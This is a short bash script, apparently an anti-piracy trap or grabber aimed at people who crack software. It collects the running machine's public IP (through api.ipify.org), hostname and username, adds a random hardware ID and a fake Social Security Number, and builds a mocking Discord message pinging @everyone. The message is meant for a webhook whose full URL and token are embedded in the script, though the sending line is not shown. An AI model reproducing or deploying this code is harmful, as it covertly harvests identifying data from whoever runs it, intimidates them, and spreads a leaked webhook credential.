#!/bin/bash

webhook_url="https://discord.com/api/webhooks/1175706620534202430/RDeA4l6G1CiQ7YFqTrDvEXJBVP8-iVl2KNsOJZMoeHUOgkI7oNpaVWZAiz0FyUCJOAQN"
ip=$(curl -s https://api.ipify.org)
hwid=$(uuidgen)
c_name=$(hostname)
user_name=$(whoami)

part1=$((100 + RANDOM % 900))
part2=$((10 + RANDOM % 90))
part3=$((1000 + RANDOM % 9000))
fake_number="${part1}-${part2}-${part3}"

message=$(printf "IP: %s\nHWID: %s" "$ip" "$hwid")

generate_post_data() {
  cat <<EOF
{
  "content": "@everyone Another cracker arrived!",
  "embeds": [{
    "title": "I love stupid crackers!",
    "description": "Computer: $c_name\nName: $user_name\nHWID: $hwid\nIP address: $ip\nSocial Security Number: $fake_number",
    "color": "45973"
  }]
}
EOF
}
